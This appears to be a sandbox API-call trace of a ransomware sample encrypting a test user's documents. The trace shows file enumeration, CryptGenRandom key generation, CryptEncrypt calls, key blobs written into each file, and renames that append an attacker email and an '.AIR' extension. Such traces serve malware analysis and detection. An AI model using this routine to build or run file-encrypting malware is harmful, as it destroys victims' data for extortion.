	[0106.246] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.246] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.246] WriteFile (in: hFile=0x524, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.251] WriteFile (in: hFile=0x524, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.251] WriteFile (in: hFile=0x524, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.253] ReadFile (in: hFile=0x524, lpBuffer=0x37b0048, nNumberOfBytesToRead=0x42400, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b0048*, lpNumberOfBytesRead=0x3a1f778*=0x42400, lpOverlapped=0x0) returned 1
	[0106.262] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x352f4e00, ftCreationTime.dwHighDateTime=0x1d4d33f, ftLastAccessTime.dwLowDateTime=0xe6330e90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6330e90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5daeb0
	[0106.263] FindNextFileW (in: hFindFile=0x5daeb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x352f4e00, ftCreationTime.dwHighDateTime=0x1d4d33f, ftLastAccessTime.dwLowDateTime=0xe6330e90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6330e90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0106.263] FindNextFileW (in: hFindFile=0x5daeb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x949db410, ftCreationTime.dwHighDateTime=0x1d4d373, ftLastAccessTime.dwLowDateTime=0xd31cd590, ftLastAccessTime.dwHighDateTime=0x1d4d300, ftLastWriteTime.dwLowDateTime=0xd31cd590, ftLastWriteTime.dwHighDateTime=0x1d4d300, nFileSizeHigh=0x0, nFileSizeLow=0xf56d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2wTS bo3RTy7tu.odt", cAlternateFileName="2WTSBO~1.ODT")) returned 1
	[0106.263] FindNextFileW (in: hFindFile=0x5daeb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3903370, ftCreationTime.dwHighDateTime=0x1d4d491, ftLastAccessTime.dwLowDateTime=0x3c4a1bf0, ftLastAccessTime.dwHighDateTime=0x1d4d20b, ftLastWriteTime.dwLowDateTime=0x3c4a1bf0, ftLastWriteTime.dwHighDateTime=0x1d4d20b, nFileSizeHigh=0x0, nFileSizeLow=0xe705, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hi6UDp.ots", cAlternateFileName="")) returned 1
	[0106.263] FindNextFileW (in: hFindFile=0x5daeb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f4d0d40, ftCreationTime.dwHighDateTime=0x1d4d47e, ftLastAccessTime.dwLowDateTime=0x6ff6bce0, ftLastAccessTime.dwHighDateTime=0x1d4c943, ftLastWriteTime.dwLowDateTime=0x6ff6bce0, ftLastWriteTime.dwHighDateTime=0x1d4c943, nFileSizeHigh=0x0, nFileSizeLow=0x7d2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pnv6CwvSlOhl.csv", cAlternateFileName="PNV6CW~1.CSV")) returned 1
	[0106.263] FindNextFileW (in: hFindFile=0x5daeb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe084b40, ftCreationTime.dwHighDateTime=0x1d4c7ed, ftLastAccessTime.dwLowDateTime=0x8ae6750, ftLastAccessTime.dwHighDateTime=0x1d4cca3, ftLastWriteTime.dwLowDateTime=0x8ae6750, ftLastWriteTime.dwHighDateTime=0x1d4cca3, nFileSizeHigh=0x0, nFileSizeLow=0x1703f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qjTEZH2afx7e687Y35.csv", cAlternateFileName="QJTEZH~1.CSV")) returned 1
	[0106.263] FindNextFileW (in: hFindFile=0x5daeb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4d25f40, ftCreationTime.dwHighDateTime=0x1d4d107, ftLastAccessTime.dwLowDateTime=0xcb2b9420, ftLastAccessTime.dwHighDateTime=0x1d4c9c8, ftLastWriteTime.dwLowDateTime=0xcb2b9420, ftLastWriteTime.dwHighDateTime=0x1d4c9c8, nFileSizeHigh=0x0, nFileSizeLow=0xbe2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="t7BkZ5.csv", cAlternateFileName="")) returned 1
	[0106.263] FindNextFileW (in: hFindFile=0x5daeb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6330e90, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6330e90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6330e90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0106.263] FindNextFileW (in: hFindFile=0x5daeb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7d27f00, ftCreationTime.dwHighDateTime=0x1d4d1ad, ftLastAccessTime.dwLowDateTime=0x24e7c980, ftLastAccessTime.dwHighDateTime=0x1d4cffe, ftLastWriteTime.dwLowDateTime=0x24e7c980, ftLastWriteTime.dwHighDateTime=0x1d4cffe, nFileSizeHigh=0x0, nFileSizeLow=0x14db3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UKnil9P7h32y4.pps", cAlternateFileName="UKNIL9~1.PPS")) returned 1
	[0106.263] FindNextFileW (in: hFindFile=0x5daeb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde1356e0, ftCreationTime.dwHighDateTime=0x1d4c572, ftLastAccessTime.dwLowDateTime=0xfeea3d90, ftLastAccessTime.dwHighDateTime=0x1d4c8ef, ftLastWriteTime.dwLowDateTime=0xfeea3d90, ftLastWriteTime.dwHighDateTime=0x1d4c8ef, nFileSizeHigh=0x0, nFileSizeLow=0xa94e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xTnaTc.pptx", cAlternateFileName="XTNATC~1.PPT")) returned 1
	[0106.263] FindNextFileW (in: hFindFile=0x5daeb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32120190, ftCreationTime.dwHighDateTime=0x1d4cf93, ftLastAccessTime.dwLowDateTime=0x4291aa20, ftLastAccessTime.dwHighDateTime=0x1d4cfc0, ftLastWriteTime.dwLowDateTime=0x4291aa20, ftLastWriteTime.dwHighDateTime=0x1d4cfc0, nFileSizeHigh=0x0, nFileSizeLow=0x660e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_xNfayzJA6iHO3O.pdf", cAlternateFileName="_XNFAY~1.PDF")) returned 1
	[0106.263] FindNextFileW (in: hFindFile=0x5daeb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32120190, ftCreationTime.dwHighDateTime=0x1d4cf93, ftLastAccessTime.dwLowDateTime=0x4291aa20, ftLastAccessTime.dwHighDateTime=0x1d4cfc0, ftLastWriteTime.dwLowDateTime=0x4291aa20, ftLastWriteTime.dwHighDateTime=0x1d4cfc0, nFileSizeHigh=0x0, nFileSizeLow=0x660e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_xNfayzJA6iHO3O.pdf", cAlternateFileName="_XNFAY~1.PDF")) returned 0
	[0106.263] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.263] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.263] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\_xNfayzJA6iHO3O.pdf", dwFileAttributes=0x80) returned 1
	[0106.264] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\_xNfayzJA6iHO3O.pdf") returned 78
	[0106.264] GetProcessHeap () returned 0x540000
	[0106.264] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102) returned 0x598b60
	[0106.264] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\_xNfayzJA6iHO3O.pdf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\_xNfayzJA6iHO3O.pdf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\_xNfayzJA6iHO3O.pdf"
	[0106.264] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\_xNfayzJA6iHO3O.pdf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\_xNfayzJA6iHO3O.pdf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\_xNfayzJA6iHO3O.pdf.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.264] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\_xNfayzJA6iHO3O.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\_xnfayzja6iho3o.pdf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\_xNfayzJA6iHO3O.pdf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\_xnfayzja6iho3o.pdf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.266] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\_xNfayzJA6iHO3O.pdf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\_xnfayzja6iho3o.pdf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x528
	[0106.266] GetProcessHeap () returned 0x540000
	[0106.266] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.266] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=26126) returned 1
	[0106.266] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x660e
	[0106.266] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.266] GetProcessHeap () returned 0x540000
	[0106.266] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.266] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.267] WriteFile (in: hFile=0x528, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.268] WriteFile (in: hFile=0x528, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.268] WriteFile (in: hFile=0x528, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.268] ReadFile (in: hFile=0x528, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x660e, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x660e, lpOverlapped=0x0) returned 1
	[0106.269] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.269] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.269] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\xTnaTc.pptx", dwFileAttributes=0x80) returned 1
	[0106.269] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\xTnaTc.pptx") returned 70
	[0106.269] GetProcessHeap () returned 0x540000
	[0106.269] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf2) returned 0x57fb28
	[0106.270] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\xTnaTc.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\xTnaTc.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\xTnaTc.pptx"
	[0106.270] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\xTnaTc.pptx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\xTnaTc.pptx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\xTnaTc.pptx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.270] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\xTnaTc.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\xtnatc.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\xTnaTc.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\xtnatc.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.289] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\xTnaTc.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\xtnatc.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x528
	[0106.289] GetProcessHeap () returned 0x540000
	[0106.289] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0106.289] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=43342) returned 1
	[0106.289] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xa94e
	[0106.289] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.289] GetProcessHeap () returned 0x540000
	[0106.289] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.289] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.289] WriteFile (in: hFile=0x528, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.321] WriteFile (in: hFile=0x528, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.321] WriteFile (in: hFile=0x528, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.322] ReadFile (in: hFile=0x528, lpBuffer=0x609bb8, nNumberOfBytesToRead=0xa94e, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0xa94e, lpOverlapped=0x0) returned 1
	[0106.323] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.323] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.323] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\UKnil9P7h32y4.pps", dwFileAttributes=0x80) returned 1
	[0106.323] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\UKnil9P7h32y4.pps") returned 76
	[0106.323] GetProcessHeap () returned 0x540000
	[0106.323] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8670
	[0106.323] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\UKnil9P7h32y4.pps" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\UKnil9P7h32y4.pps") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\UKnil9P7h32y4.pps"
	[0106.323] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\UKnil9P7h32y4.pps", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\UKnil9P7h32y4.pps.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\UKnil9P7h32y4.pps.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.323] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\UKnil9P7h32y4.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\uknil9p7h32y4.pps"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\UKnil9P7h32y4.pps.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\uknil9p7h32y4.pps.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.326] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\UKnil9P7h32y4.pps.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\uknil9p7h32y4.pps.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x528
	[0106.326] GetProcessHeap () returned 0x540000
	[0106.326] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0106.326] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=85427) returned 1
	[0106.326] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x14db3
	[0106.326] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.326] GetProcessHeap () returned 0x540000
	[0106.326] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.326] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.327] WriteFile (in: hFile=0x528, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.327] WriteFile (in: hFile=0x528, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.327] WriteFile (in: hFile=0x528, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.328] ReadFile (in: hFile=0x528, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x14db3, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x14db3, lpOverlapped=0x0) returned 1
	[0106.330] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.330] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.330] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\t7BkZ5.csv", dwFileAttributes=0x80) returned 1
	[0106.330] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\t7BkZ5.csv") returned 69
	[0106.330] GetProcessHeap () returned 0x540000
	[0106.330] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf0) returned 0x598b60
	[0106.330] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\t7BkZ5.csv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\t7BkZ5.csv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\t7BkZ5.csv"
	[0106.330] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\t7BkZ5.csv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\t7BkZ5.csv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\t7BkZ5.csv.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.330] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\t7BkZ5.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\t7bkz5.csv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rnijWLOqwHM6IwDZM\\t7BkZ5.csv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rnijwloqwhm6iwdzm\\t7bkz5.csv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
